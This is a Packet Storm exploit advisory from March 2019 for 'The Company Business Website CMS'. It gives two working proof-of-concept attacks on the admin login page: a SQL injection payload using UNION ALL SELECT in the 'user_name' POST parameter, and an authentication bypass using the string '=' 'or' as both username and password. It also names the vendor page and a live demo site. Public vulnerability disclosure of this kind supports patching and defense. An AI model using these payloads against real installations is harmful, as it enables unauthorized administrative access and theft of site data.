The Company Business Website CMS SQL Injection

2019-03-21T00:00:00
ID PACKETSTORM:152179
Type packetstorm
Reporter Ahmet Umit Bayram
Modified 2019-03-21T00:00:00

Description

                                        
                                            `# Exploit Title: The Company Business Website CMS - 'user_name' SQL  
Injection  
# Date: 20.03.2019  
# Exploit Author: Ahmet Ümit BAYRAM  
# Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms  
# Demo Site: http://thecompany.morkocbilisim.com  
# Version: Lastest  
# Tested on: Kali Linux  
# CVE: N/A  
  
----- PoC: SQLi -----  
  
Request: http://localhost/[PATH]/admin/production/login.php  
Vulnerable Parameter: user_name (POST)  
Payload: user_name=VNfn' UNION ALL SELECT  
NULL,NULL,NULL,CONCAT(CONCAT('qqkxq','mOiFXJaJzzATyiPlJyQgwuuTiDddtckLMPRRRdEH'),'qjbbq'),NULL,NULL,NULL,NULL--  
WMfV&user_password=&loggin=Psop  
  
  
# Exploit Title: The Company Business Website CMS - Authentication Bypass  
# Date: 20.03.2019  
# Exploit Author: Ahmet Ümit BAYRAM  
# Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms  
# Demo Site: http://thecompany.morkocbilisim.com  
# Version: Lastest  
# Tested on: Kali Linux  
# CVE: N/A  
----- PoC: Authentication Bypass -----  
Administration Panel: http://localhost/[PATH]/admin/production/login.php  
Username: '=' 'or'  
Password: '=' 'or'  
`